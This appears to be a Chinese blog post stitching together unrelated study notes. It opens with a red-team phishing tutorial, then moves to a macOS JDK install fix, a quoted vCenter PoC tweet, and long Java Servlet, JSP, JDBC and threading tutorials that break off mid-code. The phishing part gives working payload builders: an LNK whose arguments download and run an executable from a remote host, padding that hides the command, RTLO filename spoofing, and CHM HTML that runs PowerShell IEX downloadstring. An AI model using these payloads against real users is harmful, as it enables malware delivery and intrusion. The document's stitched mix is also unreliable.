在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式，由于本人只是个安服仔，接触的比较少（但也不能不学），就有了这篇文章，参考各位大佬的姿势总结一下。

钓鱼手段

Lnk（快捷方式）

可以在“⽬标”栏写⼊⾃⼰的恶意命令，如powershell上线命令等，这里举例为CMD

当我点击谷歌浏览器时，弹出了CMD

可以进行更改图标

• 快速生成lnk样本

$WshShell = New-Object -comObject WScript.Shell  
$Shortcut = $WshShell.CreateShortcut("test.lnk")  
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"  
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"  
$Shortcut.Arguments = "cmd /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://192.168.1.7:8000/ascotbe.exe','.\\ascotbe.exe');&cmd /c .\\ascotbe.exe"  
$Shortcut.Save()

运行

powershell -ExecutionPolicy RemoteSigned -file test.ps1

• Tips

目标文件位置所能显示最大字符串为260个，所有我们可以把执行的命令放在260个字符后面

$file = Get-Content ".\test.txt"  
$WshShell = New-Object -comObject WScript.Shell  
$Shortcut = $WshShell.CreateShortcut("test.lnk")  
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"  
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21"  
$Shortcut.Arguments = '                                                                                                                                                                                                                                      '+ $file  
$Shortcut.Save()

文件后缀RTLO

他会让字符串倒着编码

• 用Python一键生成用，把txt改为png后缀

import os  
os.rename('test.txt', 'test-\u202egnp.txt')

import os
os.rename('cmd.exe', u'no\u202eFDP.exe')

CHM文档

创建一个文件夹（名字随意），在文件夹里面再创建两个文件夹（名字随意）和一个index.html文件，在两个文件夹内部创建各创建一个index.html文件。然后先将下列代码复制到根文件夹中的index.html中

• 在index.html文件中编辑

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=',calc.exe'>
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

• 使用cs生成修改模版中的calc.exe

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
 <PARAM name="Button" value="Bitmap::shortcut">
 <PARAM name="Item1" value=",powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.100:81/a'))">
 <PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

• 使用EasyCHM编译

• 原有模版CMD

• ps上线

自解压

• 使用CS生成木马

• 创建自解压文件

• 高级自解压选项

• 解压路径-绝对路径

• 提取后运行

• 静默模式

• 更新模式

• 修改文件名

ResourceHacker

• 打开flash安装文件导出资源

• 替换资源文件

• 上线

office宏

本地加载

• 新建word，创建宏

• cs生成宏粘贴

• 保存为启用宏的文档

• 打开文档上线

远程加载

编写一个带有宏代码的DOTM文档，并启用一个http服务将DOTM放置于web下

• 新建一个任意的模版的docx文档并且解压

• 编辑settings.xml.rels文件中的Target为我们第一个DOTM的http地址

• 重新压缩改后缀名为.docx

• 模拟点击上线

参考

https://www.ascotbe.com/2020/07/26/office_0x01/#LNK%E9%92%93%E9%B1%BC

https://paper.seebug.org/1329/

利用winrar自解压捆版payload制作免杀钓鱼木马

因为学习当中需要用到低版本的Jdk，我下载了一个jdk7u67版本，当我兴致勃勃的双击下去之后，却遭遇到这样的一个错误

• 解决方法

安装包pkg解压以后修改里面的判断版本的代码，然后在打包安装就可以了。

操作步骤

• 将安装包JDK 7 Update 67.pkg解压成unpkg包

╰─➤  pkgutil --expand JDK 7 Update 67.pkg /tmp/jdk.unpkg

• 进入jdk.unpkg，里面有个Distribution的文件，输入vim Distribution编辑此文件

• 编辑文件，修改验证逻辑

function pm_install_check() {
  return true;
}

• 修改完如图

• 再次打包成pkg

pkgutil --flatten /tmp/jdk.unpkg /tmp/jdk.pkg

• 安装低版本Jdk

We found an Unauthenticated Arbitrary File Read vulnerability in VMware vCenter. VMware revealed that this vulnerability was patched in 6.5u1, but no CVE was assigned.

The PoC ⬇️ pic.twitter.com/LfvbyBUhF5

— PT SWARM (@ptswarm) October 13, 2020

Servlet

实现了Servlet接口的java程序叫做Servlet

• 引入Servlet包

<dependencies>
        <dependency>
            <groupId>javax.servlet</groupId>
            <artifactId>javax.servlet-api</artifactId>
            <version>3.1.0</version>
        </dependency>

        <dependency>
            <groupId>javax.servlet.jsp</groupId>
            <artifactId>jsp-api</artifactId>
            <version>2.2</version>
        </dependency>
    </dependencies>

• 新建moudle修改web.xml头信息

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
          http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
</web-app>

helloServlet

编写代码

import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;

public class helloservlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        PrintWriter writer = resp.getWriter ();
        writer.print ("hello,y4er");

    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }


}

• 编写Servlet映射（web.xml中）

  <servlet>
    <servlet-name>hello</servlet-name>
    <servlet-class>helloservlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>hello</servlet-name>
    <url-pattern>/hello</url-pattern>
  </servlet-mapping>

• 运行测试

ServletContext

this.getInitParameter() 初始化参数
this.getServletConfig() Servlet配置
this.getServletContext() Servlet上下文

共享数据

• helloservlet

import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.PrintWriter;

public class helloservlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        ServletContext servletContext = this.getServletContext ();

        String user = "syst1m";

        servletContext.setAttribute ("username",user);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }


}

• replyservlet

import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;

public class replyservlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        ServletContext servletContext = this.getServletContext ();
        String username = (String) servletContext.getAttribute ("username");

        resp.setContentType ("text/html");
        resp.setCharacterEncoding ("utf-8");
        resp.getWriter ().print ("名字为"+username);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet (req, resp);
    }
}

• 注册Servlet

 <servlet>
    <servlet-name>hello</servlet-name>
    <servlet-class>helloservlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>hello</servlet-name>
    <url-pattern>/hello</url-pattern>
  </servlet-mapping>
  <servlet>
    <servlet-name>reply</servlet-name>
    <servlet-class>replyservlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>reply</servlet-name>
    <url-pattern>/reply</url-pattern>
  </servlet-mapping>

• 运行测试

获得初始化参数

• 注册Servlet

  <context-param>
    <param-name>jdbc</param-name>
    <param-value>jdbc:mysql://localhost:3306/mybatis</param-value>
  </context-param>

 <servlet>
    <servlet-name>jdbc</servlet-name>
    <servlet-class>jdbcServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>jdbc</servlet-name>
    <url-pattern>/jdbc</url-pattern>
  </servlet-mapping>

• 代码

import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;

public class jdbcServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        ServletContext servletContext = this.getServletContext ();
        String url = servletContext.getInitParameter ("jdbc");
        resp.getWriter ().print (url);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        super.doPost (req, resp);
    }
}

• 运行测试

转发

• code

public class forward extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        ServletContext servletContext = this.getServletContext ();
        servletContext.getRequestDispatcher ("/jdbc").forward (req,resp);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        super.doPost (req, resp);
    }
}

读取资源文件

• db.properties

username=syst1m
password=123456

• code

import javax.servlet.ServletContext;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.IOException;
import java.io.InputStream;
import java.util.Properties;

public class jdbcServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

        InputStream is = this.getServletContext ().getResourceAsStream ("WEB-INF/classes/db.properties");

        Properties prop = new Properties ();
        prop.load (is);
        String username = prop.getProperty ("username");
        String password = prop.getProperty ("password");

        resp.getWriter ().print (username+password);

    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        super.doPost (req, resp);
    }
}

• 运行测试

HttpServletResponse

Response下载文件

• code

public class FileServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        //获取下载文件的路径
        String realPath = "/Users/syst1m/code/chabugservlet/com.web.servlet/src/main/resources/1.png";
        String FileName = realPath.substring (realPath.lastIndexOf ("\")+1);
        resp.setHeader ("Content-Disposition","attachment;filename="+ URLEncoder.encode (FileName,"UTF-8"));
        FileInputStream in = new FileInputStream (realPath);
        int len = 0;
        byte[] buffer = new byte[1024];
        ServletOutputStream out = resp.getOutputStream ();
        while((len=in.read(buffer))>0){
            out.write (buffer,0,len);
        }

        in.close();
        out.close ();
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
}

• 注册Servlet

</servlet-mapping>
  <servlet>
    <servlet-name>down</servlet-name>
    <servlet-class>FileServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>down</servlet-name>
    <url-pattern>/down</url-pattern>
  </servlet-mapping>

• 运行测试

Response实现验证码

• code

public class captchaServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

        //浏览器每三秒刷新一次
        resp.setHeader ("refresh","3");
        //内存中创建一张图片
        BufferedImage image = new BufferedImage (80,20,BufferedImage.TYPE_3BYTE_BGR);
        //得到图片
        Graphics2D g = (Graphics2D)image.getGraphics ();
        //设置图片背景色
        g.setColor (Color.white);
        g.fillRect (0,0,80,80);
        //给图片写数据
        g.setColor (Color.blue);
        g.setFont (new Font (null,Font.BOLD,20));
        g.drawString (makenum(),1,20);
        //浏览器：以图片类型打开
        resp.setContentType ("image/jpeg");
        //清除缓存，不让浏览器缓存
        resp.setDateHeader ("expires",-1);
        resp.setHeader ("Cache-Control","no-cache");
        resp.setHeader ("Pragme","no-cache");
        // 把图片写给浏览器
        ImageIO.write (image,"jpg",resp.getOutputStream ());

    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
    //生成随机数

    private String makenum(){
        Random random = new Random ();
        String num = random.nextInt (9999)+"";
        StringBuffer sb = new StringBuffer ();

        for (int i = 0; i < 7-num.length (); i++) {
            sb.append ("0");
        }
        num = sb.toString ()+num;
        return num;
    }
}

• 注册Servlet

<servlet>
    <servlet-name>img</servlet-name>
    <servlet-class>captchaServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>img</servlet-name>
    <url-pattern>/img</url-pattern>
  </servlet-mapping>

• 运行测试

Response实现重定向

resp.sendRedirect

HttpServletRequest

• 注册Servlet

 <servlet>
    <servlet-name>LoginServlet</servlet-name>
    <servlet-class>LoginServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>LoginServlet</servlet-name>
    <url-pattern>/login</url-pattern>
  </servlet-mapping>

• index.jsp

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>登陆</title>
</head>
<body>
<h1>登陆</h1>
    <div>
        <form action="${pageContext.request.contextPath}/login" method="post">

            用户名：<input type="text" name="username"><br>
            密码：<input type="password" name="password"><br>
            爱好：
            <input type="checkbox" name="hobbys" value="女孩">女孩
            <input type="checkbox" name="hobbys" value="代码">代码
            <input type="checkbox" name="hobbys" value="chabug">chabug
            <input type="checkbox" name="hobbys" value="渗透测试">渗透测试

            <br>
            <button type="submit">submit</button>
        </form>
    </div>
</body>
</html>  

• success.jsp

<%@ page contentType="text/html;charset=UTF-8" language="java" %>
<html>
<head>
    <title>登陆成功</title>
</head>
<body>
<h1>登陆成功</h1>
</body>
</html>

• LoginServlet

public class LoginServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
       req.setCharacterEncoding ("UTF-8");
       resp.setCharacterEncoding ("UTF-8");
       String username = req.getParameter ("username");
       String password = req.getParameter ("password");
       String[] hobbys = req.getParameterValues ("hobbys");

       System.out.println (username);
       System.out.println (password);
       System.out.println (Arrays.toString (hobbys));
       req.getRequestDispatcher ("/success.jsp").forward (req,resp);


    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
}

• 运行测试

Cookie

• 注册Servlet

  <servlet>
    <servlet-name>cookie</servlet-name>
    <servlet-class>CookieServlet</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>cookie</servlet-name>
    <url-pattern>/cookie</url-pattern>
  </servlet-mapping>
</web-app>

• code

public class CookieServlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

        //解决乱码

        req.setCharacterEncoding ("UTF-8");
        resp.setCharacterEncoding ("UTF-8");
        PrintWriter out = resp.getWriter ();
        Cookie[] cookies = req.getCookies ();

        if(cookies!=null){
            out.write ("你上一次的时间是");
            for (int i = 0; i < cookies.length; i++) {
                Cookie cookie = cookies[i];
                if(cookie.getName ().equals ("lastlogintime")){
                    long logintime = Long.parseLong (cookie.getValue ());
                    Date date = new Date (logintime);
                    out.write (date.toLocaleString ());
                }
            }
        }else {
            out.write ("这是你第一次访问本站点");
        }
        Cookie cookie = new Cookie ("lastlogintime",System.currentTimeMillis ()+"");
        cookie.setMaxAge (***);
        resp.addCookie (cookie);
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
}

• 运行测试

Session

• 设置，读取，删除

protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        //获取Sesseion对象
        HttpSession session=request.getSession();
        session.setAttribute("username", "zhangsan");//存储数据
        session.getAttribute("username");//获取数据
        session.removeAttribute("username");//删除数据
    }

• Session的销毁

session.invalidate()

JSP

• jsp原理

内置对象

final javax.servlet.jsp.PageContext pageContext; 页面上下文
javax.servlet.http.HttpSession session1 = null; session
final javax.servlet.ServletContext application; applicationContext
final javax.servlet.ServletConfig config; config
javax.servlet.jsp.JspWriter out = null; out 
final java.lang.Object page = this; page 当前
HttpServletRequest request  请求
HttpServletResponse response 响应

• maven依赖

JSTL表达式依赖

<dependency>
    <groupId>javax.servlet.jsp.jstl</groupId>
    <artifactId>jstl-api</artifactId>
    <version>1.2</version>
</dependency>

standard标签库

<dependency>
    <groupId>taglibs</groupId>
    <artifactId>standard</artifactId>
    <version>1.1.2</version>
</dependency>

JSP基础语法和指令

• Tomcat热部署

https://blog.csdn.net/jc0803kevin/article/details/88579109

• Jsp表达式

<%--jsp表达式，用来将程序的输出，输出到客户端--%>
<%--<%= 变量或表达式%>--%>
<%= new java.util.Date()%>

• jsp脚本片段

<%

    int sum = 0;
    for (int i = 0; i < 100; i++) {
        sum+=1;
    }

    out.println ("<h1>sum="+sum+"</h1>");
%>

• jso声明

<%!

    static {
        System.out.println ("Loading Servlet");
    }

    private int globalVar = 0;

    public void test(){
        System.out.println ("进入了方法test");
    }
%>

jsp声明会被编译到JSP生成的java的类中，其他的会被生成到_jspServlet方法中

JSP指令

• 定制错误页面

<%@page args...%>

<%@page errorPage="err/err.html" %>

• 文件包含

<%@include file="index.jsp"%>
<jsp:include page="index.jsp">

JSP内置对象及作用域

• 9大内置对象

PageContext  存东西
Request  存东西
Response
Session
Application  [ServletContext] 存东西
config  [ServletConfig]
out
page
exception

• code

 pageContext.setAttribute("name1","syst1m1");  //一个页面中有效
 request.setAttribute("name2","syst1m2"); //一个请求中有效
 session.setAttribute("name3"."syst1m3"); //一个会话中有效
 application.setAttribute("name4"."syst1m4"); //保存的数据在服务器中中有效

• 通过寻找的方式获取

pageContext.findAttribute();

• 重定向

pageContext.forward()

Jsp、JSTL标签、EL表达式

EL表达式

• el表达式 ${}

获取数据

${标识符}

执行运算
获取web开发的常用对象

jsp标签

<jsp:forward page="test.jsp">
    <jsp:param name="paramtest" value="test"/>
</jsp:forward>

JSTL表达式

核心标签

• 引入JSTL核心标签库

<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>

• set标签：将值保存在指定的作用域中

<%-- var="变量名"  value="值" scope="保存在哪个作用域（page、request、session、application）"--%>
<c:set var="userName" value="yzq" scope="page"></c:set>
<span>${userName}</span><%--配合EL表达式取值--%>

• out标签：将结果输出

<%--取值--%>
<c:out value="${userName}"></c:out>

• if标签：判断

<c:if test="${age>20}">

    <span>奔三的人了</span>

</c:if>

• choose：选择，跟java中的switch语句类似

<c:set var="age" scope="page" value="40"></c:set>
<c:choose>

    <%--符合该条件时执行--%>
    <c:when test="${age>20&&age<30}">
        <span>奔三的人了</span>
    </c:when>

    <%--符合该条件时执行--%>
    <c:when test="${age<20}">
        <span>还是小鲜肉</span>

    </c:when>

    <%--之前条件都不满足时，执行这个--%>
    <c:otherwise>

        <span>可以考虑养生了</span>

    </c:otherwise>
</c:choose>

• forEach标签：用于迭代集合

<%--迭代标签 用于迭代集合--%>
<c:forEach items="${users}" var="user">

    <span>${user.name}</span>:<span>${user.age}</span>
    <br>

</c:forEach>

JavaBean

一般用来与数据库的字段做映射

code

• javabean.java

package com.bean.pojo;

public class People {

    private int id;
    private String name;
    private int age;
    private String address;

    public People() {
    }

    public People(int id, String name, int age, String address) {
        this.id = id;
        this.name = name;
        this.age = age;
        this.address = address;
    }

    public int getId() {
        return id;
    }

    public void setId(int id) {
        this.id = id;
    }

    public String getName() {
        return name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public int getAge() {
        return age;
    }

    public void setAge(int age) {
        this.age = age;
    }

    public String getAddress() {
        return address;
    }

    public void setAddress(String address) {
        this.address = address;
    }

    @Override
    public String toString() {
        return "People{" +
                "id=" + id +
                ", name='" + name + ''' +
                ", age=" + age +
                ", address='" + address + ''' +
                '}';
    }
}

• javabean.jsp

<jsp:useBean id="people" class="com.javabean.pojo.People" scope="page"/>
<jsp:setProperty name="people" property="address" value="北京"></jsp:setProperty>
<jsp:getProperty name="people" property="address"/>

过滤器Filter

• 编写Servlet

public class helloservlet extends HttpServlet {

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
         resp.getWriter ().write ("你好呀，世界");
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
        doGet(req, resp);
    }
}

• 编写Filter

public class encodeing implements Filter {
    public void init(FilterConfig filterConfig) throws ServletException {
    }

    public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        servletRequest.setCharacterEncoding ("utf-8");
        servletResponse.setCharacterEncoding ("utf-8");
        servletResponse.setContentType ("text/html;charset=UTF-8");
        System.out.println ("过滤器执行前");
        filterChain.doFilter (servletRequest,servletResponse);
        System.out.println ("过滤器执行后");
    }

    public void destroy() {

    }
}

• 注册Filter

<filter>
    <filter-name>encode</filter-name>
    <filter-class>encodeing</filter-class>
  </filter>
  <filter-mapping>
    <filter-name>encode</filter-name>
    <url-pattern>/*</url-pattern>
  </filter-mapping>

• 测试

监听器

统计在线人数Demo

• index.jsp

<html>
<body>
<h2>Hello World!</h2>


<h1>当前有<span><%=this.getServletConfig().getServletContext().getAttribute("OnlineCount")%></span></h1>
</body>
</html>

• OnlineCount

@Override
    public void sessionCreated(HttpSessionEvent httpSessionEvent) {
        ServletContext ctx = httpSessionEvent.getSession ().getServletContext ();
        Integer onlineCount = (Integer)ctx.getAttribute ("OnlineCount");

        if(onlineCount==null){
            onlineCount=new Integer (1);
        }else {
            int count= onlineCount.intValue ();
            onlineCount = new Integer (count+1);
        }
        ctx.setAttribute ("OnlineCount",onlineCount);
    }

    //销毁session监听
    @Override
    public void sessionDestroyed(HttpSessionEvent httpSessionEvent) {
        ServletContext ctx = httpSessionEvent.getSession ().getServletContext ();
        Integer onlineCount = (Integer)ctx.getAttribute ("OnlineCount");

        if(onlineCount==null){
            onlineCount=new Integer (0);
        }else {
            int count= onlineCount.intValue ();
            onlineCount = new Integer (count-1);
            httpSessionEvent.getSession ().invalidate ();
        }
        ctx.setAttribute ("OnlineCount",onlineCount);
    }

• 注册监听器

<listener>
    <listener-class>OnlineCount</listener-class>
</listener>

• 测试

JDBC(Java fatabase connect)

JDBC

package com.jdbc4;

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import java.sql.Timestamp;
import java.util.Date;

public class TestUpdate {

  /**
   * @param args
   */
  public static void main(String[] args) {
    Connection conn=null;
    try {
      Class.forName("com.mysql.jdbc.Driver");
      //建立连接  ctrl+shfit +o
      conn=DriverManager.getConnection("jdbc:mysql://localhost/test?useUnicode=true&characterEncoding=utf-8", "root", "19810109");
      String sql="update book set title=?,price=?,birth=?,publish_date=?,update_date=? where id=?";
      //预编译
      PreparedStatement pstmt=conn.prepareStatement(sql);
      pstmt.setString(1, "四集");
      pstmt.setFloat(2, 50.55f);
      pstmt.setDate(3, new java.sql.Date(new Date().getTime()));
      pstmt.setTimestamp(4, new Timestamp(new Date().getTime()));
      pstmt.setTimestamp(5, new Timestamp(new Date().getTime()));
      pstmt.setInt(6, 1);

      //执行
      pstmt.executeUpdate();
    } catch (Exception e) {
      e.printStackTrace();
    }
    finally
    {
      try {
        conn.close();
      } catch (SQLException e) {
        e.printStackTrace();
      }
    }
  }

}

JDBC事务

connection.setAutoCommit(false) 开启事务

• 继承Thread类

public class Threadtest extends Thread {

    /**
     *
     * 多线程学习
     * **/
    @Override
    public void run(){
        for (int i = 0; i < 2000; i++) {
            System.out.println("我在看代码--");
        }
    }
    public static void main(String[] args) {

        Threadtest test = new Threadtest();

        test.start();
        for (int i = 0; i < 2000; i++) {
            System.out.println("我在学习多线程--");
        }
    }

• 实现Runnable接口

public class Threadtest implements Runnable {

    /**
     *
     * 多线程学习
     * **/
    @Override
    public void run(){
        for (int i = 0; i < 2000; i++) {
            System.out.println("我在看代码--");
        }
    }
    public static void main(String[] args) {

        Threadtest test = new Threadtest();

        new Thread(test).start();

        for (int i = 0; i < 2000; i++) {
            System.out.println("我在学习多线程--");
        }
    }


}

• 龟兔赛跑

public class Threadtest implements Runnable {

    /**
     *
     * 龟兔赛跑
     * **/

    private static String winner;

    @Override
    public void run(){
        for (int i = 0; i <= 100; i++) {
            if(Thread.currentThread().getName().equals("兔子")&& 1%10 ==0){
                try{
                    Thread.sleep(10);
                }catch (InterruptedException e){
                    e.printStackTrace();
                }
            }

            boolean flag = gameover(i);

            if ((flag)) {
                break;
            }

            System.out.println(Thread.currentThread().getName()+"跑了"+i+"步");
        }
    }

    private boolean gameover(int steps){
        if(winner!=null){
            return true;
        }{
            if(steps>=100){
                winner = Thread.currentThread().getName();
                System.out.println("winner is"+winner);
            }
        }

        return false;
    }
    public static void main(String[] args) {

        Threadtest test = new Threadtest();
        new Thread(test,"兔子").start();
        new Thread(test,"乌龟").start();
    }


}

• 线程停止（建议使用标志位）

public class Threadtest implements Runnable {

    /**
     *
     * 龟兔赛跑
     * **/

    private boolean flag = true;

    @Override
    public void run(){
        int i =0;
        while (flag){
            System.out.println("run...Thread"+i++);
        }
    }

    public void stop(){
        this.flag = false;
    }


    public static void main(String[] args) {
        Threadtest test = new Threadtest();
        new Thread(test).start();

        for (int i = 0; i < 1000; i++) {
            System.out.println("main"+i);

            if(i==900) {
                test.stop();
                System.out.println("子线程停止");
            }
        }
    }

}

• 线程休眠

Thread.sleep(1000)

• 线程礼让（yield）

public class Threadtest implements Runnable {


    private boolean flag = true;

    @Override
    public void run(){
        System.out.println(Thread.currentThread().getName()+"线程开始执行");
        Thread.yield();
        System.out.println(Thread.currentThread().getName()+"线程停止执行");
    }

    public static void main(String[] args) {
        Threadtest test = new Threadtest();

        new Thread(test,"a").start();
        new Thread(test,"b").start();
    }

}

• 线程强制执行(join)

public class Threadtest implements Runnable {


    @Override
    public void run(){
        for (int i = 0; i < 1000; i++) {
            System.out.println("线程vipl来了"+i);
        }
    }

    public static void main(String[] args) throws InterruptedException{

        Threadtest test = new Threadtest();
        Thread thread = new Thread(test);
        thread.start();

        for (int q = 0; q < 500; q++) {
            if(q==200){
                thread.join();
            }
            System.out.println("main"+q);
        }
    }

}

• 线程优先级

优先级只是意味着获得调度的概率低，并不是优先级低就不会被调用，顺序也是概率高，顺序可能也是不同的，全看CPU的调度

public class Threadtest {


    public static void main(String[] args) throws InterruptedException{

        //主线程默认优先级
        System.out.println(Thread.currentThread().getName()+"---->"+Thread.currentThread().getPriority());

        MyPriority MyPriority = new MyPriority();

        Thread t1= new Thread(MyPriority);
        Thread t2= new Thread(MyPriority);
        Thread t3= new Thread(MyPriority);

        //设置优先级

        t1.start();
        t2.setPriority(6);
        t2.start();
        t3.setPriority(Thread.MAX_PRIORITY);
        t3.start();
    }

}

class MyPriority implements Runnable{

    @Override
    public void run(){
        System.out.println(Thread.currentThread().getName()+"---->"+Thread.currentThread().getPriority());
    }
}

• 守护线程

public class TestDaemon {

    /**
     * 测试守护线程
     * **/

    public static void main(String[] args) throws InterruptedException{

        god god = new god();
        Y4er Y4er = new Y4er();

         Thread thread = new Thread(god);
        thread.setDaemon(true);
        thread.start();

        new Thread(Y4er).start();

    }

}


class god implements Runnable{

    @Override
    public void run(){
        while (true){
            System.out.println("上帝保佑着你");
        }
    }
}
class Y4er implements Runnable{

    @Override
    public void run(){
        for (int i = 0; i < 36500; i++) {
            System.out.println("开心的活着");
        }

        System.out.println("Googbyg world");
    }
}

• 线程同步

锁机制

synchronized(放置于资源竞争处)

同步方法

private synchronized void buy(){xx}

同步块

synchronized(Obj){}

• 死锁

public class DeadLock {

    public static void main(String[] args) {

        Makeup g1= new Makeup(0,"灰姑娘");
        Makeup g2= new Makeup(1,"白雪公主");
        g1.start();
        g2.start();
    }
}

//口红
class LipStick{}

//镜子

class Mirror{}

class Makeup extends Thread{

    static LipStick lipStick = new LipStick();
    static Mirror mirror = new Mirror();

    int choice;
    String girlName;

    Makeup(int choice,String girlName){
        this.choice = choice;
        this.girlName = girlName;
    }

    @Override
    public void run() {
        try {
            makeup();
        }catch (InterruptedException e){
            e.printStackTrace();
        }
    }

    private void makeup() throws InterruptedException{
        if(choice==0){
            synchronized (lipStick){
                System.out.println(this.girlName+"获得口红的🔒");
                Thread.sleep(1000);
                synchronized(mirror){
                    System.out.println(this.girlName+"获得镜子的🔒");
                }

            }
        }else {
            synchronized (mirror){
                System.out.println(this.girlName+"获得口红的🔒");
                Thread.sleep(1000);
                synchronized(lipStick){
                    System.out.println(this.girlName+"获得镜子的🔒");
                }

            }
        }
    }
}

• Lock锁

import java.util.concurrent.locks.ReentrantLock;

public class TestLock {

    public static void main(String[] args) {
        TestLock2 test = new TestLock2();
        new Thread(test).start();
        new Thread(test).start();
        new Thread(test).start();

    }
}


class TestLock2 implements Runnable{


    int ticketNums = 10;

    private final ReentrantLock lock = new ReentrantLock();

    @Override
    public void run() {
        while(true){
            try{
                lock.lock();

                if(ticketNums>0){
                    try{
                        Thread.sleep(1000);
                    }catch (InterruptedException e){
                        e.printStackTrace();
                    }
                    System.out.println(ticketNums--);
                }else {
                    break;
                }
            }finally {
                lock.unlock();
            }
        }
    }
}

线程协作（生产者与消费者问题）

管程法

/**
 *
 *测试生产者消费者模型-》利用缓冲区解决：管程法
**/

//生产者，消费者，产品，缓冲区
public class TestPC {

    public static void main(String[] args) {
        SynContainer container = new SynContainer();

        new Productor(container).start();
        new Consumer(container).start();
    }
}


//生产者

class Productor extends Thread{

    SynContainer container;
    public Productor(SynContainer container){
        this.container = container;
    }

    //生产


    @Override
    public void run() {
        for (int i = 0; i < 100; i++) {
            System.out.println("生产了"+i+"只鸡");
            container.push(new Chicken(i));
        }
    }
}


//消费者
